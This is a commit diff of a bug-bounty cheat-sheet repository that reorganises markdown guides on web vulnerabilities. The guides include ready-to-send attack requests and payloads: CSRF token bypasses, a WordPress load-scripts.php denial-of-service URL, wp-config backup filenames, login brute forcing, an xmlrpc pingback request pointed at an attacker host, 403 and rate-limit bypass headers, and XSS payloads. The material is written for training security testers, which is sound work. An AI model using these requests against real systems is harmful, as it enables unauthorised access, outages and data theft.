STRLCPY/AllAboutBugBounty

Bypass/Bypass File Upload.md Arbitrary File Upload.md

Content is identical

■ ■ ■ ■ ■ ■

Business Logic Errors.md

1	1		# Business Logic Errors
2	2
3		-	## Introduction
	3	+	## Introduction
4	4		Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.
5	5
6		-	## How to Find
	6	+	## How to find
7	7		1. Review Functionality
8	8		- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
9	9		- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
		skipped 44 lines
54	54		- Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment
55	55		- Response Manipulation to bypass certain restrictions such as 2FA Bypass
56	56
57		-	Reference:
58		-	- [@harshbothra_](https://twitter.com/harshbothra_)
	57	+	## References
	58	+	* [@harshbothra_](https://twitter.com/harshbothra_)

■ ■ ■ ■ ■ ■

Bypass/Bypass 2FA.md

1		-	# 2FA Bypass
	1	+	# Bypass Two-Factor Authentication
2	2
3	3		1. Response manipulation
4	4
		skipped 85 lines
90	90		code=null
91	91		```
92	92
93		-	Source: [Harsh Bothra](https://twitter.com/harshbothra_) and other writeup
	93	+	## References
	94	+	* [Harsh Bothra](https://twitter.com/harshbothra_)
	95	+	* Other writeup

■ ■ ■ ■ ■ ■

Bypass/Bypass 304.md

1		-	# 304 Not Modified Bypass
	1	+	# Bypass 304 (Not Modified)
2	2
3	3		1. Delete "If-None-Match" header
4	4		```
		skipped 21 lines
26	26		If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b
27	27		```
28	28
29		-	Source: [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
	29	+	## References
	30	+	* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521)
30	31

■ ■ ■ ■ ■ ■

Bypass/Bypass 403.md

1		-	# 403 Forbidden Bypass
2		-
3		-	## Tools
4		-
5		-	* [Bypass-403 \| Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
6		-
	1	+	# Bypass 403 (Forbidden)
7	2
8		-	## Exploit
9	3		1. Using "X-Original-URL" header
10	4		```
11	5		GET /admin HTTP/1.1
		skipped 55 lines
67	61		X-Original-URL: /admin
68	62		```
69	63
70		-	Source:
	64	+	## Tools
	65	+	* [Bypass-403 \| Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
	66	+
	67	+	## References
71	68		- [@iam_j0ker](https://twitter.com/iam_j0ker)
72	69		- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
73	70

■ ■ ■ ■ ■ ■

Bypass/Bypass 429.md

1		-	# 429 Rate limit Bypass
	1	+	# Bypass 429 (Too Many Requests)
	2	+
2	3		1. Try add some custom header
3	4		```
4	5		X-Forwarded-For : 127.0.0.1
		skipped 75 lines
80	81		{"email":"[email protected] "}
81	82		```
82	83
	84	+	## References
	85	+	* [Huzaifa Tahir](https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd)
	86	+	* [Gupta Bless](https://gupta-bless.medium.com/rate-limiting-and-its-bypassing-5146743b16be)

■ ■ ■ ■ ■ ■

Bypass/Bypass CSRF.md

1	+	# Bypass CSRF
2	+
3	+	1. Change single character
4	+	```
5	+	POST /register HTTP/1.1
6	+	Host: target.com
7	+	[...]
8	+
9	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
10	+	```
11	+	Try this to bypass
12	+	```
13	+	POST /register HTTP/1.1
14	+	Host: target.com
15	+	[...]
16	+
17	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
18	+	```
19	+
20	+	2. Sending empty value of token
21	+	```
22	+	POST /register HTTP/1.1
23	+	Host: target.com
24	+	[...]
25	+
26	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
27	+	```
28	+	Try this to bypass
29	+	```
30	+	POST /register HTTP/1.1
31	+	Host: target.com
32	+	[...]
33	+
34	+	username=dapos&password=123456&token=
35	+	```
36	+
37	+	3. Replace the token with same length
38	+	```
39	+	POST /register HTTP/1.1
40	+	Host: target.com
41	+	[...]
42	+
43	+	username=dapos&password=123456&token=aaaaaa
44	+	```
45	+	Try this to bypass
46	+	```
47	+	POST /register HTTP/1.1
48	+	Host: target.com
49	+	[...]
50	+
51	+	username=dapos&password=123456&token=aaabaa
52	+	```
53	+	4. Changing POST / GET method
54	+	```
55	+	POST /register HTTP/1.1
56	+	Host: target.com
57	+	[...]
58	+
59	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
60	+	```
61	+	Try this to bypass
62	+	```
63	+	GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
64	+	Host: target.com
65	+	[...]
66	+	```
67	+
68	+	5. Remove the token from request
69	+	```
70	+	POST /register HTTP/1.1
71	+	Host: target.com
72	+	[...]
73	+
74	+	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
75	+	```
76	+	Try this to bypass
77	+	```
78	+	POST /register HTTP/1.1
79	+	Host: target.com
80	+	[...]
81	+
82	+	username=dapos&password=123456
83	+	```
84	+
85	+	6. Use another user's valid token
86	+	```
87	+	POST /register HTTP/1.1
88	+	Host: target.com
89	+	[...]
90	+
91	+	username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
92	+	```
93	+
94	+	7. Try to decrypt hash
95	+	```
96	+	POST /register HTTP/1.1
97	+	Host: target.com
98	+	[...]
99	+
100	+	username=dapos&password=123456&token=MTIzNDU2
101	+	```
102	+	MTIzNDU2 => 123456 with base64
103	+
104	+	8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
105	+	```
106	+	POST /register HTTP/1.1
107	+	Host: target.com
108	+	[...]
109	+
110	+	username=dapos&password=123456&token=vi802jg9f8akd9j123
111	+	```
112	+	When we register again, the request like this
113	+	```
114	+	POST /register HTTP/1.1
115	+	Host: target.com
116	+	[...]
117	+
118	+	username=dapos&password=123456&token=vi802jg9f8akd9j124
119	+	```
120	+	If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
121	+

■ ■ ■ ■ ■ ■

Bypass/Bypass Captcha.md

1	1		# Bypass Captcha
	2	+
2	3		1. Try changing the request method, for example POST to GET
3	4		```
4	5		POST / HTTP 1.1
		skipped 73 lines

■ ■ ■ ■ ■ ■

CMS/WordPress.md

1	-	# WordPress Common Bugs
2	-
3	-	1. Denial of Service via load-scripts.php
4	-	```
5	-	http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
6	-	```
7	-
8	-	2. Denial of Service via load-styles.php
9	-	```
10	-	http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
11	-	```
12	-
13	-	3. Log files exposed
14	-	```
15	-	http://target.com/wp-content/debug.log
16	-	```
17	-
18	-	4. Backup file wp-config exposed
19	-	```
20	-	.wp-config.php.swp
21	-	wp-config.inc
22	-	wp-config.old
23	-	wp-config.txt
24	-	wp-config.html
25	-	wp-config.php.bak
26	-	wp-config.php.dist
27	-	wp-config.php.inc
28	-	wp-config.php.old
29	-	wp-config.php.save
30	-	wp-config.php.swp
31	-	wp-config.php.txt
32	-	wp-config.php.zip
33	-	wp-config.php.html
34	-	wp-config.php~
35	-	```
36	-
37	-	5. Information disclosure wordpress username
38	-	```
39	-	http://target.com/?author=1
40	-	```
41	-	```
42	-	http://target.com/wp-json/wp/v2/users
43	-	http://target.com/?rest_route=/wp/v2/users
44	-	```
45	-
46	-	6. Bruteforce in wp-login.php
47	-	```
48	-	POST /wp-login.php HTTP/1.1
49	-	Host: target.com
50	-
51	-	log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
52	-	```
53	-
54	-	7. XSPA in wordpress
55	-	```
56	-	POST /xmlrpc.php HTTP/1.1
57	-	Host: target.com
58	-
59	-	<methodCall>
60	-	<methodName>pingback.ping</methodName>
61	-	<params><param>
62	-	<value><string>http://yourip:port</string></value>
63	-	</param><param>
64	-	<value>
65	-	<string>https://target.com></string>
66	-	</value>
67	-	</param></params>
68	-	</methodCall>
69	-	```
70	-

■ ■ ■ ■ ■ ■

Cross Site Request Forgery.md

1	1		# Cross Site Request Forgery (CSRF)
	2	+
2	3		## Introduction
3	4		Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
4	5
5		-	## How to Find
6		-
	6	+	## How to exploit
7	7		1. HTML GET Method
8	8
9	9		```html
		skipped 28 lines
38	38		xhr.send('{"role":admin}');
39	39		</script>
40	40		```
41		-
42		-	## Bypass CSRF Token
43		-	1. Change single character
44		-	```
45		-	POST /register HTTP/1.1
46		-	Host: target.com
47		-	[...]
48		-
49		-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
50		-	```
51		-	Try this to bypass
52		-	```
53		-	POST /register HTTP/1.1
54		-	Host: target.com
55		-	[...]
56		-
57		-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
58		-	```
59		-
60		-	2. Sending empty value of token
61		-	```
62		-	POST /register HTTP/1.1
63		-	Host: target.com
64		-	[...]
65		-
66		-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
67		-	```
68		-	Try this to bypass
69		-	```
70		-	POST /register HTTP/1.1
71		-	Host: target.com
72		-	[...]
73		-
74		-	username=dapos&password=123456&token=
75		-	```
76		-
77		-	3. Replace the token with same length
78		-	```
79		-	POST /register HTTP/1.1
80		-	Host: target.com
81		-	[...]
82		-
83		-	username=dapos&password=123456&token=aaaaaa
84		-	```
85		-	Try this to bypass
86		-	```
87		-	POST /register HTTP/1.1
88		-	Host: target.com
89		-	[...]
90		-
91		-	username=dapos&password=123456&token=aaabaa
92		-	```
93		-	4. Changing POST / GET method
94		-	```
95		-	POST /register HTTP/1.1
96		-	Host: target.com
97		-	[...]
98		-
99		-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
100		-	```
101		-	Try this to bypass
102		-	```
103		-	GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
104		-	Host: target.com
105		-	[...]
106		-	```
107		-
108		-	5. Remove the token from request
109		-	```
110		-	POST /register HTTP/1.1
111		-	Host: target.com
112		-	[...]
113		-
114		-	username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
115		-	```
116		-	Try this to bypass
117		-	```
118		-	POST /register HTTP/1.1
119		-	Host: target.com
120		-	[...]
121		-
122		-	username=dapos&password=123456
123		-	```
124		-
125		-	6. Use another user's valid token
126		-	```
127		-	POST /register HTTP/1.1
128		-	Host: target.com
129		-	[...]
130		-
131		-	username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
132		-	```
133		-
134		-	7. Try to decrypt hash
135		-	```
136		-	POST /register HTTP/1.1
137		-	Host: target.com
138		-	[...]
139		-
140		-	username=dapos&password=123456&token=MTIzNDU2
141		-	```
142		-	MTIzNDU2 => 123456 with base64
143		-
144		-	8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
145		-	```
146		-	POST /register HTTP/1.1
147		-	Host: target.com
148		-	[...]
149		-
150		-	username=dapos&password=123456&token=vi802jg9f8akd9j123
151		-	```
152		-	When we register again, the request like this
153		-	```
154		-	POST /register HTTP/1.1
155		-	Host: target.com
156		-	[...]
157		-
158		-	username=dapos&password=123456&token=vi802jg9f8akd9j124
159		-	```
160		-	If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part
161		-

■ ■ ■ ■ ■ ■

Cross Site Scripting.md

1	1		# XSS Cheat Sheet (Basic)
2	2
3		-	## Introduction
	3	+	## Introduction
4	4		Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack:
5	5		- Reflected XSS
6	6
		skipped 5 lines
12	12
13	13		A type of XSS that has payloads found in the DOM rather than within the HTML code.
14	14
15		-	## Payloads
	15	+	## How to exploit
16	16		1. Basic payload
17	17		```html
18	18		<script>alert(1)</script>
		skipped 362 lines
381	381		<img ignored=() src=x onerror=prompt(1)>
382	382		```
383	383
384		-	Reference:
	384	+	## References
385	385		- [Brute Logic](https://brutelogic.com.br/)
	386	+	- Some random twitter posts

■ ■ ■ ■ ■ ■

Denial Of Service.md

1	1		# Denial of Service
2	2
3		-	## Introduction
	3	+	## Introduction
4	4		Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
5		-	## How to Find
	5	+	## How to FInd
6	6
7	7		1. Cookie bomb
8	8
9		-	```
10		-	https://target.com/index.php?param1=xxxxxxxxxxxxxx
11		-	```
	9	+	```
	10	+	https://target.com/index.php?param1=xxxxxxxxxxxxxx
	11	+	```
12	12		After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
13	13
14	14		2. Try input a very long payload to form. For example using very long password or using very long email
15		-	```
16		-	POST /Register
17		-	[...]
	15	+	```
	16	+	POST /Register HTTP/1.1
	17	+	Host: target.com
	18	+	[...]
18	19
19		-	username=victim&password=aaaaaaaaaaaaaaa
20		-	```
	20	+	username=victim&password=aaaaaaaaaaaaaaa
	21	+	```
21	22
22	23		3. Pixel flood, using image with a huge pixels
23	24
24		-	Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0)
	25	+	Download the payload: [Here](https://daffa.tech/lottapixel3.jpg)
25	26
26	27		4. Frame flood, using GIF with a huge frame
27	28
		skipped 84 lines
112	113
113	114		![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png)
114	115
115		-	References:
	116	+	## References
116	117		- [Hackerone #840598](https://hackerone.com/reports/840598)
117	118		- [Hackerone #105363](https://hackerone.com/reports/105363)
118	119		- [Hackerone #390](https://hackerone.com/reports/390)
		skipped 7 lines

■ ■ ■ ■ ■ ■

Exposed Source Code.md

1	1		# Exposed Source Code
2	2
3		-	## Introduction
	3	+	## Introduction
4	4		Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
5	5
6		-	## How to Find
	6	+	## How to FInd
7	7		1. Exposed Git folder
8	8		```
9	9		https://site.com/.git
10	10		```
11	11		![GIT folder](https://1.bp.blogspot.com/-wTZOuULaqNw/XliI9jS0w3I/AAAAAAAAATA/VZxs7VL5PCY8FdnoKaEjS6AWpcjoJz4MgCLcBGAsYHQ/s1600/1.png)
12	12
	13	+	Tools to dump .git
	14	+	* https://github.com/arthaud/git-dumper
	15	+
13	16		2. Exposed Subversion folder
14	17		```
15	18		https://site.com/.svn
16	19		```
17	20		![SVN folder](https://1.bp.blogspot.com/-5bC_EhFShgk/XliJqiw8pJI/AAAAAAAAATI/2HhrX0Ea3MwQ60Ax2tzNprNvulggPrZAACLcBGAsYHQ/s1600/1.png)
18	21
	22	+	Tools to dump .svn
	23	+	* https://github.com/anantshri/svn-extractor
	24	+
19	25		3. Exposed Mercurial folder
20	26		```
21	27		https://site.com/.hg
22	28		```
23	29		![HG folder](https://1.bp.blogspot.com/-4FaqUeTlv4k/XliKHBOpgmI/AAAAAAAAATQ/sLdwhvSF-Jgn0WF5P-PouLp6uTeHUAOWACLcBGAsYHQ/s1600/1.png)
24	30
	31	+	Tools to dump .hg
	32	+	* https://github.com/arthaud/hg-dumper
	33	+
25	34		4. Exposed Bazaar folder
26	35		```
27	36		http://target.com/.bzr
28	37		```
29	38		![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png)
30	39
	40	+	Tools to dump .bzr
	41	+	* https://github.com/shpik-kr/bzr_dumper
	42	+
31	43		5. Exposed Darcs folder
32	44		```
33	45		http://target.com/_darcs
34	46		```
	47	+
	48	+	Tools to dump _darcs (Not found)
35	49
36	50		6. Exposed Bitkeeper folder
37	51		```
38	52		http://target.com/Bitkeeper
39	53		```
40	54
41		-	Reference:
42		-	- [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html)
	55	+	Tools to dump BitKeeper (Not found)
	56	+
	57	+	## Reference
	58	+	* [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html)
43	59

■ ■ ■ ■ ■ ■

Framework/Zend.MD

1	-	# Common bug in Zend framework
2	-	1. Exposed config files
3	-	* Full Path Exploit : http://target.com//application/configs/application.ini
4	-

■ ■ ■ ■ ■ ■

Host Header Injection.md

1	1		# Host Header Injection
2	2
3		-	## Introduction
	3	+	## Introduction
4	4		HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.
5	5
6		-	## How to Find
7		-
	6	+	## How to exploit
8	7		1. Change the host header
9	8		```
10	9		GET /index.php HTTP/1.1
		skipped 36 lines
47	46		Host: evil-website.com
48	47		...
49	48		```
50		-	Reference:
51		-	- [PortSwigger](https://portswigger.net/web-security/host-header/exploiting)
	49	+
	50	+	## References
	51	+	* [PortSwigger](https://portswigger.net/web-security/host-header/exploiting)
52	52

■ ■ ■ ■ ■ ■

Insecure Direct Object References.md

1	1		# Insecure Direct Object Reference (IDOR)
2	2
3		-	## Introduction
	3	+	## Introduction
4	4		IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
5	5
6		-	## How to Find
	6	+	## How to FInd
7	7		1. Add parameters onto the endpoints for example, if there was
8	8		```
9	9		GET /api/v1/getuser
		skipped 142 lines
152	152
153	153		16. Try google dorking to find new endpoint
154	154
155		-	Reference:
156		-	- [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup
	155	+	## References
	156	+	* [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup
157	157

■ ■ ■ ■ ■ ■

Misc/Account Takeover.md

1	1		# Account Takeover
2	2
3		-	## Introduction
	3	+	## Introduction
4	4		Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.
5	5
6		-	## How to Find
	6	+	## How to exploit
7	7		1. Using OAuth Misconfiguration
8	8		- Victim has a account in evil.com
9	9		- Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
		skipped 47 lines

■ ■ ■ ■ ■ ■

Misc/Broken Link Hijacking.md

1	1		# Broken Link Hijacking
2	2
3		-	## Tools
4		-	- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
5		-
6		-	## Definition
	3	+	## Introduction
7	4		Broken Link Hijacking exists whenever a target links to an expired domain or page
8	5
9	6		## How to find
10	7		1. Manually find external links on the target site (For example, check some links to social media accounts)
11	8		2. Try using tools to find broken link, for example using tools that listed in this readme
12	9
13		-	References:
14		-	- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
	10	+	## Tools
	11	+	- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
15	12
	13	+	## References
	14	+	- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
16	15		- [How I was able to takeover the company’s LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d)
	16	+	- [Hackerone #1466889](https://hackerone.com/reports/1466889)

Misc/Default Credentials.csv

Diff is too large to be displayed.

■ ■ ■ ■ ■ ■

Misc/Email Spoofing.md

1	1		# Email Spoofing
	2	+
2	3		## Introduction
3	4		Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value.
4	5
5		-	## How to Find
	6	+	## How to detect
6	7		1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing
7	8		```
8	9		v=spf1 include:_spf.google.com ~all
		skipped 8 lines

■ ■ ■ ■ ■ ■

Misc/Exposed API keys.md

1		-	# Exposed API Keys
	1	+	# Exposed API Keys / Token OAuth
	2	+
	3	+	## Introduction
	4	+	Sometimes in a web application, an attacker can find some exposed API keys / token which can lead to financial loss to a company.
	5	+
	6	+	## How to find
	7	+	1. Find API keys / token by looking at the JavaScript code on the website
	8	+	2. Find API keys / token by checking the request / response header
2	9
3	10		## Tools
4	11		* [Key-Checker](https://github.com/daffainfo/Key-Checker)
5	12
6		-	## Definition
7		-	Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company.
8		-
9		-	## How to exploit
10		-	[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys
	13	+	# References
	14	+	* [keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys
	15	+	* [all-about-apikey](https://github.com/daffainfo/all-about-apikey) is a repository of detailed information about API Key / Oauth tokens. The repository contain description API key, HTTP request, the response if the API key is valid / no, regex, and the example

■ ■ ■ ■ ■ ■

Misc/JWT Vulnerabilities.md

1	1		# JWT Vulnerabilities
	2	+
2	3		## Introduction
3	4		JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.
4	5
5		-	## How to Exploit
	6	+	## How to exploit
6	7		1. Modify the algorithm to "none" algorithm
7	8		```
8	9		{
		skipped 9 lines
18	19
19	20		the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code.
20	21
21		-	Reference:
	22	+	## Tools
	23	+	* [jwt-hack](https://github.com/hahwul/jwt-hack)
	24	+
	25	+	## Reference
22	26		- [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)

■ ■ ■ ■ ■ ■

Misc/Mass Assignment.md

1	1		# Mass Assignment Attack
	2	+
2	3		## Introduction
3	4		Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
4	5
5		-	## How to Exploit
	6	+	## How to exploit
6	7		- Normal request
7	8		```
8	9		POST /editdata
		skipped 22 lines
31	32
32	33		username=daffa&admin=true
33	34		```
	35	+
	36	+	## References
	37	+	* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)

■ ■ ■ ■ ■ ■

Misc/Password Reset Flaws.md

1	1		## Password Reset Flaws
2	2
	3	+	## Introduction
	4	+	Common security flaws in password reset functionality
	5	+
	6	+	## How to exploit
3	7		1. Parameter pollution in reset password
4	8		```
5	9		POST /reset
		skipped 71 lines
77	81		```
78	82		POST /newaccount
79	83		[...]
80		-	{“email”:“[email protected]”,”[email protected]”,“token”:”xxxxxxxxxx”}
	84	+	{"email":"[email protected]","[email protected]","token":"xxxxxxxxxx"}
81	85		```
82	86
83	87		9. Find out how the tokens generate
		skipped 1 lines
85	89		- Generated based on the ID of the user
86	90		- Generated based on the email of the user
87	91		- Generated based on the name of the user
88		-	> [For Example](https://medium.com/bugbountywriteup/how-i-discovered-an-interesting-account-takeover-flaw-18a7fb1e5359)
	92	+
